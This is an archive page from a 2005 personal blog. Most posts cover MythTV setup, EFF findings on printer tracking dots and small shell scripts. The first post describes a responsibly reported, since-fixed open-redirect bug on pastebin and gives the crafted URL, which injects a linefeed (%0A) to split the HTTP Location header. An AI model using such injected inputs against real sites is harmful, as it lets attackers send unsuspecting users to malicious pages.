I had spent some time yesterday doing some other security audits, and figured I’d poke around at pastebin. Overall, the system was fine (only two inputs: text and name — both were strongly filtered). I did discover a redirect bug, though, which would let me use the site to redirect to somewhere else. While there isn’t anything to “steal” on pastebin, a bad guy could still trick their unsuspecting friends into visiting other (maybe more dangerous?) websites.

I reported the problem to pastebin’s author (Paul Dixon), and he had it fixed before I woke up. That’s how vulnerability reporting is supposed to work! Thanks Paul!

Here’s how it used to work. From the pastebin help, you can type in a subdomain to use for your pastebin. (Like “yayoutflux” above.) The form did some checking (no /’s allowed), but would accidentally let you send whitespace, including a linefeed.

Normally, a web redirect from that form would look something like this, where the user input is shown in bold:

HTTP/1.1 302 Found
Location: http://yayoutflux.pastebin.com

However, if I add a linefeed (URL encoded as %0A: http://pastebin.com/pastebin.php?goprivate=cnn.com%0A), I could break the “Location” tag, and trick the browser into going somewhere else:

HTTP/1.1 302 Found
Location: http://cnn.com
.pastebin.com

Great illustration of redirection XSS.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

10/23/2005

mythtv original air date visibility

Filed under: Multimedia — kees @ 3:12 pm

I have been really unhappy with MythTV’s visibility of program “Original Air Date” information, which as far as I could tell is only visible through the Program Finder. I wanted to be able to see original air date while I browsed my recordings. Digging through the MythTV code has proven very difficult. The documentation has been minimal, and I haven’t found any tutorials on theme creation, which seems to be where all the visible components of the mythfrontend get their details from.

While looking for the bleeding-edge code, I did find http://cvs.mythtv.org/ which is actually a Subversion repository, bug tracker, and wiki. There a nice start to information there, including doxygen output. Also, the #mythtv-users channel on freenode has a nice MythTV FAQ.

The bulk of the display stuff I was looking from takes place in programs/mythfrontend/playbackbox.cpp (thank Bryce). The “cursorDown” function led me through to the “update*” functions, and eventually ToMap/SetText calls, which load program information into a hash, and then pass that hash to the theme engine.

libs/libmythtv/programinfo.cpp has ToMap defined, and all the various hash keys are visible, including the original air date variable I was looking for:

progMap[“title”] = title;
progMap[“subtitle”] = subtitle;
progMap[“description”] = description;

progMap[“originalairdate”]= originalAirDate.toString(dateFormat);

SetText is in libs/libmyth/uitypes.cpp. Hash items are uppercased to match %-enclosed words from the themes. The first “|” seen is to identify “what appears in front”, and the second is “what’s after”.

I modified the ui.xml from my theme (G.A.N.T. currently) from:

  <value>%SUBTITLE|”|”
%%STARS%%DESCRIPTION%</value>

to:

  <value>%SUBTITLE|”|” %%ORIGINALAIRDATE|(|)
%%STARS%%DESCRIPTION%</value>

So now, when I scroll down to Smallville, I see in the description box:

“Aqua” (2005-10-20)
During a beach party Lois hits her head when she jumps into the lake, and …

Ta-da! Original Air Date in parens. Now, being able to see the year is important, so I had to change my date format to one that included the year, but it’s ugly. To fix this, I need to actually change code. In “MythDateFormat” from programs/mythfrontend/globalsettings.cpp, I added:

gc->addSelection(sampdate.toString(“ddd MMM d, yyyy”), “ddd MMM d, yyyy”);

Now I just have to get it compiled. :)

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

10/19/2005

color printer tracking

Filed under: Reverse Engineering,Security — kees @ 3:28 pm

I’m a little behind in my Slashdot reading, so apologies to those that saw this earlier.

The EFF cracked the nearly invisible finger-printing code produced by color printers. This system is used by most (if not all) major color printer manufacturers to report the serial number of the printer used and the date a page was printed. This system has been in place for at least 10 years. I’m horrified at this kind of privacy invasion. To quote the EFF:

“Underground democracy movements that produce political or religious pamphlets and flyers, like the Russian samizdat of the 1980s, will always need the anonymity of simple paper documents, but this technology makes it easier for governments to find dissenters,” said EFF Senior Staff Attorney Lee Tien. “Even worse, it shows how the government and private industry make backroom deals to weaken our privacy by compromising everyday equipment like printers. The logical next question is: what other deals have been or are being made to ensure that our technology rats on us?”

EFF press release: http://www.eff.org/news/archives/2005_10.php#004063
Washington Post coverage: http://www.washingtonpost.com/wp-dyn/content/article/2005/10/18/AR2005101801663.html
Slashdot: http://yro.slashdot.org/article.pl?sid=05/10/18/1210237&tid=158&tid=194

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

10/16/2005

mythtv button sounds

Filed under: Multimedia — kees @ 11:51 am

Well, I’ve discovered that my “slow to respond” UI was entirely due to the lirc “repeat” settings. I’ve eliminated (“repeat=0”) the repeat settings for the Esc, Up, Down, Left, Right, Space, and Return buttons. I discovered this only after seeing that ircat was just as slow to respond. I’ve hacked together a “make noise” script (named “irnoise”) that runs along with mythfrontend:

#!/bin/bash
export SOUNDS=~mythtv/sounds

ircat mythtv | while read NAME; do
  case “$NAME” in
   Return|Space)
    SOUND=select.wav
    ;;
   *)
    SOUND=default.wav
    ;;
  esac
  #echo “$NAME: $SOUND”
  aplay -q “$SOUNDS”/”$SOUND”
done

This gives me my “boop” and “click” noises for all remote buttons. Yay! Since I couldn’t find the official TiVo noises, and I don’t feel like taking my TiVo apart right now, I just grabbed some noises I found online. From the “MiscWAVs.zip”, I used “THUD.WAV” and “BTN_DWN.WAV”:

sox src/THUD.WAV -t wav -c 1 -s -w -r 48000 default.wav resample
sox src/BTN_DWN.WAV -t wav -c 1 -s -w -r 48000 -v 2 select.wav resample
normalize-audio -m default.wav select.wav

Not a lot of complaints left with my MythTV installation. :)

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

mythtv dpi

Filed under: Multimedia — kees @ 9:43 am

I accidentally fixed my “fonts are too small” problem. While reading the MythTV development notes, there was mention of everything being designed for a 100dpi screen resolution. As it turns out, my Xorg config was defaulting to 75dpi, so I forced it with the DisplaySize option. Since my video card uses 640×480 for it’s NTSC output, I had to modify the recommended settings to use:

DisplaySize 162 121 # 100 DPI @ 640×480

I was surprised to discover that this solved my font size issues. I had so totally given up on the font size problem I didn’t even list it was a problem in the prior MythTV blog entry. :) I was actually expecting fonts to get even smaller, but I guess this changes how font selection is done, and as a result, everything appears sane now. Neato!

Also yesterday, in the hopes of reducing the effects of the “crappy audio” problem, and allowing multiple programs to have the soundcard open, I figured out how to get ALSA working natively within MythTV. In the MythTV configurations, the sound device should be “ALSA:default” instead of “/dev/dsp”, and the mixer should be “default” instead of “/dev/mixer”. The start of this was gleaned from the link I mentioned earlier. Mixer settings were found through trial and error. Strangely, MythMusic had a separate playback configuration, so I had to change that to “ALSA:default” as well.

Now that ALSA is being used, the audio choppiness has not returned. I can still get desync’d A/V, but I think that’s entirely due to disk latency issues, or something like that. Usually when it happens, if I pause or restart playback, it goes away. Also, since multiple programs can open the ALSA device and play sounds at the same time (thank you ALSA dmix), I can start looking at how to add a tool to play “button press notification” sounds. I’ll initial probably use something like “ircat” piped to a reader just to get a proof-of-concept. Then I’ll find some hooks in mythfrontend to attach it to instead. Eventually, I was a themeable visual notification. I should probably join the dev list to make sure other folks aren’t already working on this.

I’ve also found mention of “show type priority bumping”, where “New Episode” can trigger a bump in the priority of a recording. This may be a good step towards recording new Stargates at high priority, but reruns at very low priority. In the priority adjusting tool, I can see the third row for this kind of priority bump, but I can’t find the UI elements to adjust it.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

10/15/2005

mythtv OMG

Filed under: Multimedia — kees @ 9:25 am

I was preparing myself to deal with the “pain” of moving to a multimedia system that didn’t have all the feature tweaks I need. MythTV has surprised me in that after only a week, and I’ve solved almost all my issues through just finding the right configuration options.

As of about Tuesday (2 days after the initial “commitment”), I was ready to call it “better than my existing system”. It had a few glitches that bugged me, but overall, it had many many more features than I was expecting. After watching Smallville Thursday night, I’m a total freak for MythTV. Smallville was basically the first “Production” show MythTV recorded for me. I had recorded “Medium” earlier in the week, and that served as a good way to feel out the interface. Smallville is the real test because it’s at position 1 in my TiVo (and MythTV) recording priorities. I had no irritations while watching it. Nicely done, MythTV.

Rewind to Saturday. Bryce and I spent about 12 hours straight digging through KnoppMyth both on his new system and my machine that I brought over to his place. By the end of it, I had entirely reinstalled my system with Debian Sid, and installed the most current ivtv drivers, with the apt-able myth binaries. We had figured out how to get KnoppMyth running with the newer tuner chip, but Bryce’s HD audio card wasn’t supported in that version of the kernel. Let me just say, everyone should just start with the latest ivtv driver. It detected everything correctly right off the bat. On Sunday, Bryce installed Gentoo, and got the latest ivtv, etc, everything was happy.

Early this week I toyed with the remote control settings, and discovered a whole mess of MPlayer commands I didn’t know about that let you control playback speed (including fast audio!), OSD text (so I can have a visible indication that I’m paused), etc. After restoring my other MPlayer defaults (16M cache, readable font, etc), MPlayer stuff was in great shape again, including DVD playback. I also programmed my spare TiVo remote to control my stereo power and volume. I’m down to 1 remote finally! (I was surprised that the TiVo remote programming codes aren’t online anywhere. The only guide seems to be in the TiVo itself.)

Yesterday I discovered MythWeb. I must have been blind to miss it before. That’ll teach me not to read the entire EFF MythTV guide first. Full scheduling, guide data, recorded show lists, and most importantly, the ability to adjust the keybindings for the various MythTV modules. In the MythMusic module, I was infuriated that “PgDn” would skip to the next song, instead of (wait for it) paging down in the list of songs. I just can’t understand why such a massively counter-intuitive setting is the default.

The commercial detection system is greate so far. It’s already painful for me to go back to using my TiVo where I have to press the “skip 30 seconds” button ten times to get past all the commercials.

Current issues:

  • Interface is slow. Everything (especially the video browser) is slow to respond. I miss not having an audible notification that a remote button was received, but there should at least be SOME kind of visible change if a button is pressed.
  • Intermitant crappy audio playback. Something goofy happens on playback sometimes where the audio is just totally trashed. I just have to quit the playback and try again. I wonder if switching everything to using ALSA would make things better.
  • No way to record the same show with two priorities. I want to have “New Episodes Only” for “Stargate: SG-1” at a high priority, but “Any time, any channel” for it at a very low priority. I haven’t figured out how to do this yet. I think I will have to write special recording rules for it in SQL somewhere secret.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

10/6/2005

freaky screen locking

Filed under: General — kees @ 8:54 pm

This afternoon, for no reason at all, I was annoyed that my music didn’t pause when I locked my screen. So I fixed that. Tonight, I checked my RSS feeds and discovered that Corey did exactly the same thing today.

I think that’s really freaky. Inter-city Open Source Mind-Meld. Only I did mine with xscreensaver and xmms:

#!/bin/bash
xmms –pause
xscreensaver-command lock

What I want now is a way to get xmms to unpause after I unlock my screen. :) I thought of a horrible hack for xscreensaver to do this, but I’m hoping there’s some other way.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

« Newer PostsOlder Posts »

Powered by WordPress